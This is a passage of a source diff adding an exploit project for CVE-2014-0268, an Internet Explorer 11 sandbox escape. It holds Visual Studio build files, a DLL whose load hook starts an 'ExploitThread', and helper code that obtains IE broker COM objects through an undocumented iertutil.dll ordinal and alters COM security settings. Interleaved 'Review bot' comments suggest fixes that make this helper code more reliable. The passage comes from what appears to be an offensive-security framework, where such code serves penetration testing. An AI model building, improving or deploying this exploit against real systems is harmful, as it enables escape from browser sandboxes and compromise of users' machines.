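+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>CVE20140268</RootNamespace>
+<ProjectName>CVE-2014-0268</ProjectName>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClInclude Include="stdafx.h" />
+<ClInclude Include="targetver.h" />
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="CVE-2014-0268.cpp" />
+<ClCompile Include="dllmain.cpp">
+<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+</PrecompiledHeader>
+<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+</PrecompiledHeader>
+</ClCompile>
+<ClCompile Include="stdafx.cpp">
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+</ClCompile>
+</ItemGroup>
+<ItemGroup>
+<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+</ProjectReference>
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>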
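--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+DWORD ul_reason_for_call,
+LPVOID lpReserved
+)
+{
+switch (ul_reason_for_call)
+{
+case DLL_PROCESS_ATTACH:
+CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+break;
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+case DLL_PROCESS_DETACH:
+break;
+}
+return TRUE;
+}
+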
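Review bot: The thread handle returned by `CreateThread` in the DLL_PROCESS_ATTACH case is discarded, so each load leaks a handle and a failed thread creation is never noticed; `HANDLE h = CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); if (h) CloseHandle(h);` preserves the behaviour without the leak, since ExploitThread ends in FreeLibraryAndExitThread and nothing waits on the handle. A one-line comment such as `// COM work is deferred to a thread: it must not run under the loader lock inside DllMain` would also explain to the next reader why the exploit is not invoked directly here.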
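--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file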
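--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>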
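--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>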
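--- a/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
@@ -0,0 +1,154 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>CommandUtils</RootNamespace>
+<ProjectName>CommonUtils</ProjectName>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>StaticLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>StaticLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>StaticLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>StaticLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup />
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>Use</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClInclude Include="regln.h" />
+<ClInclude Include="stdafx.h" />
+<ClInclude Include="targetver.h" />
+<ClInclude Include="Utils.h" />
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="regln.cpp">
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
+</ClCompile>
+<ClCompile Include="stdafx.cpp">
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+</ClCompile>
+<ClCompile Include="Utils.cpp" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>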
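--- a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp
@@ -0,0 +1,373 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+#include "Utils.h"
+
+#include <strsafe.h>
+#include <sddl.h>
+#include <Shlwapi.h>
+
+#pragma comment(lib, "shlwapi.lib")
+
+static BOOL g_hasShDocIID;
+static IID g_shDocIID;
+
+BOOL GetIIDForName(LPCWSTR lpName, IID* riid)
+{
+HKEY hRoot = nullptr;
+ULONG status;
+
+status = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"Interface", 0, KEY_ENUMERATE_SUB_KEYS, &hRoot);
+if (status == 0)
+{
+WCHAR keyName[128];
+DWORD index = 0;
+BOOL foundKey = FALSE;
+
+while (true)
+{
+HKEY hSubKey;
+
+status = RegEnumKeyW(hRoot, index, keyName, _countof(keyName));
+if (status != 0)
+{
+break;
+}
+
+index++;
+
+status = RegOpenKeyEx(hRoot, keyName, 0, KEY_QUERY_VALUE, &hSubKey);
+if (status != 0)
+{
+continue;
+}
+
+DWORD dwType;
+WCHAR valueName[256];
+DWORD dwSize = sizeof(valueName)-sizeof(WCHAR);
+
+status = RegQueryValueEx(hSubKey, nullptr, nullptr, &dwType, (BYTE*)valueName, &dwSize);
+RegCloseKey(hSubKey);
+
+if ((status != 0) || (dwType != REG_SZ))
+{
+continue;
+}
+
+// Ensure NUL terminate
+valueName[dwSize / sizeof(WCHAR)] = 0;
+
+if (_wcsicmp(valueName, lpName) == 0)
+{
+foundKey = TRUE;
+break;
+}
+}
+
+RegCloseKey(hRoot);
+
+if (foundKey)
+{
+return SUCCEEDED(IIDFromString(keyName, riid));
+}
+}
+else
+{
+DebugPrintf("Could not open Interface key %d\n", status);
+}
+
+return FALSE;
+}
+
+REFIID GetSHDocIID()
+{
+if (!g_hasShDocIID)
+{
+memset(&g_shDocIID, 0, sizeof(g_shDocIID));
+
+g_hasShDocIID;
+
+GetIIDForName(L"ISHDocVwBroker", &g_shDocIID);
+}
+
+return g_shDocIID;
+}
+
+bstr_t GetTemp(LPCWSTR name)
+{
+WCHAR tempPath[MAX_PATH];
+
+GetTempPath(MAX_PATH, tempPath);
+
+PathAppend(tempPath, name);
+
+return tempPath;
+}
+
+bstr_t GetTempPath()
+{
+WCHAR tempPath[MAX_PATH];
+
+GetTempPath(MAX_PATH, tempPath);
+
+return tempPath;
+}
+
+bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len)
+{
+WCHAR tempPath[MAX_PATH];
+
+GetTempPath(MAX_PATH, tempPath);
+
+PathAppend(tempPath, name);
+
+FILE* fp = nullptr;
+
+if (_wfopen_s(&fp, tempPath, L"wb") == 0)
+{
+fwrite(buf, 1, len, fp);
+
+fclose(fp);
+
+return tempPath;
+}
+else
+{
+return L"";
+}
+}
+
+std::vector<unsigned char> ReadFileToMem(LPCWSTR name)
+{
+FILE* fp;
+std::vector<unsigned char> ret;
+
+if (_wfopen_s(&fp, name, L"rb") == 0)
+{
+fseek(fp, 0, SEEK_END);
+
+ret.resize(ftell(fp));
+fseek(fp, 0, SEEK_SET);
+
+fread(&ret[0], 1, ret.size(), fp);
+
+fclose(fp);
+}
+
+return ret;
+}
+
+void DebugPrintf(LPCSTR lpFormat, ...)
+{
+#ifdef _DEBUG
+CHAR buf[1024];
+va_list va;
+
+va_start(va, lpFormat);
+
+StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
+
+OutputDebugStringA(buf);
+#endif
+}
+
+bstr_t GetUserSid()
+{
+HANDLE hToken = nullptr;
+PTOKEN_USER pUser = nullptr;
+LPWSTR userName = nullptr;
+bstr_t ret;
+
+if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
+{
+DebugPrintf("Error opening process token: %d", GetLastError());
+goto error;
+}
+
+//TOKEN_USER user = { 0 };
+DWORD retLength = 0;
+
+if (!GetTokenInformation(hToken, TokenUser, nullptr, 0, &retLength))
+{
+if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
+{
+DebugPrintf("Error getting token information size: %d", GetLastError());
+goto error;
+}
+}
+
+pUser = (PTOKEN_USER) new char[retLength];
+
+if (!GetTokenInformation(hToken, TokenUser, pUser, retLength, &retLength))
+{
+DebugPrintf("Error getting token information: %d", GetLastError());
+goto error;
+}
+
+if (!ConvertSidToStringSidW(pUser->User.Sid, &userName))
+{
+DebugPrintf("Error converting Sid to String: %d", GetLastError());
+goto error;
+}
+
+ret = userName;
+
+error:
+
+if (hToken)
+{
+CloseHandle(hToken);
+}
+
+if (pUser)
+{
+delete[] pUser;
+}
+
+if (userName)
+{
+LocalFree(userName);
+}
+
+return ret;
+}
+
+typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
+
+GUID CLSID_CShdocvwBroker = { 0x9C7A1728,
+0x0B694, 0x427A, { 0x94, 0xA2, 0xA1, 0xB2, 0xC6, 0x0F, 0x03, 0x60 } };
+
+void DisableImpersonation(IUnknown* pUnk)
+{
+IClientSecurity* sec = nullptr;
+
+HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
+if (SUCCEEDED(hr))
+{
+hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_ANONYMOUS, nullptr, EOAC_NONE);
+DebugPrintf("SetBlanket: %08X", hr);
+sec->Release();
+}
+else
+{
+DebugPrintf("Error getting client security: %08X", hr);
+}
+}
+
+void SetCloaking(IUnknown* pUnk)
+{
+IClientSecurity* sec = nullptr;
+
+HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
+if (SUCCEEDED(hr))
+{
+hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT,
+RPC_C_IMP_LEVEL_IDENTIFY, nullptr, EOAC_DYNAMIC_CLOAKING);
+DebugPrintf("SetBlanket: %08X", hr);
+sec->Release();
+}
+else
+{
+DebugPrintf("Error getting client security: %08X", hr);
+}
+}
+
+IIEUserBrokerPtr CreateBroker()
+{
+HMODULE hMod = LoadLibrary(L"iertutil.dll");
+
+fCoCreateUserBroker pfCoCreateUserBroker = (fCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
+
+if (pfCoCreateUserBroker)
+{
+IIEUserBrokerPtr broker;
+
+HRESULT ret = pfCoCreateUserBroker(&broker);
+
+DebugPrintf("CreateBroker: %08X - %p", ret, broker);
+
+return broker;
+}
+
+return nullptr;
+}
+
+IShdocvwBroker* CreateSHDocVw()
+{
+IIEUserBrokerPtr broker = CreateBroker();
+
+if (broker != nullptr)
+{
+HRESULT ret;
+IShdocvwBroker* shdocvw;
+ret = broker->BrokerCreateKnownObject(CLSID_CShdocvwBroker, GetSHDocIID(), (IUnknown**)&shdocvw);
+DebugPrintf("IShdocvwBroker: %08X %p", ret, shdocvw);
+
+if (SUCCEEDED(ret))
+{
+return shdocvw;
+}
+}
+
+return nullptr;
+}
+
+bstr_t GetWindowsSystemDirectory()
+{
+WCHAR buf[MAX_PATH];
+
+GetSystemDirectory(buf, MAX_PATH);
+
+return buf;
+}
+
+bstr_t GetExecutableFileName(HMODULE hModule)
+{
+WCHAR buf[MAX_PATH];
+
+::GetModuleFileNameW(hModule, buf, MAX_PATH);
+
+return buf;
+}
+
+bstr_t GetSessionPath()
+{
+std::wstringstream ss;
+
+WCHAR objPath[MAX_PATH + 1] = { 0 };
+ULONG length = MAX_PATH;
+DWORD dwSessionId;
+
+if (ProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId))
+{
+ss << L"\\Sessions\\" << dwSessionId;
+
+return ss.str().c_str();
+}
+
+return L"";
+}
+
+LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString)
+{
+return RegSetValueEx(hKey, lpName, 0, REG_SZ, (const BYTE*)lpString, (wcslen(lpString) + 1) * sizeof(WCHAR));
+}
+
+LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d)
+{
+return RegSetValueEx(hKey, lpName, 0, REG_DWORD, (const BYTE*)&d, sizeof(d));
+}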
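Review bot: `g_hasShDocIID;` inside GetSHDocIID is an expression statement with no effect, so the flag is never set and every call re-enumerates the whole HKEY_CLASSES_ROOT\Interface tree through GetIIDForName; it should read `g_hasShDocIID = GetIIDForName(L"ISHDocVwBroker", &g_shDocIID);` so the result is cached only when the lookup succeeded rather than a zeroed IID being handed to BrokerCreateKnownObject on every retry. Separately, ReadFileToMem takes `&ret[0]` even when ftell reported 0 bytes, which is undefined on an empty vector; guard the read with `if (!ret.empty())`. CreateBroker resolves an undocumented iertutil.dll export by ordinal (58) and never checks the LoadLibrary result; on another IE build that ordinal may resolve to nothing or to a different function, so a comment recording which IE 11 build the ordinal was taken from would save the next person a debugging session.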
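--- a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h
@@ -0,0 +1,21 @@
+#include "interfaces.h"
+
+#include <vector>
+
+bstr_t GetTemp(LPCWSTR name);
+bstr_t GetTempPath();
+bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len);
+std::vector<unsigned char> ReadFileToMem(LPCWSTR name);
+void DebugPrintf(LPCSTR lpFormat, ...);
+bstr_t GetUserSid();
+void DisableImpersonation(IUnknown* pUnk);
+void SetCloaking(IUnknown* pUnk);
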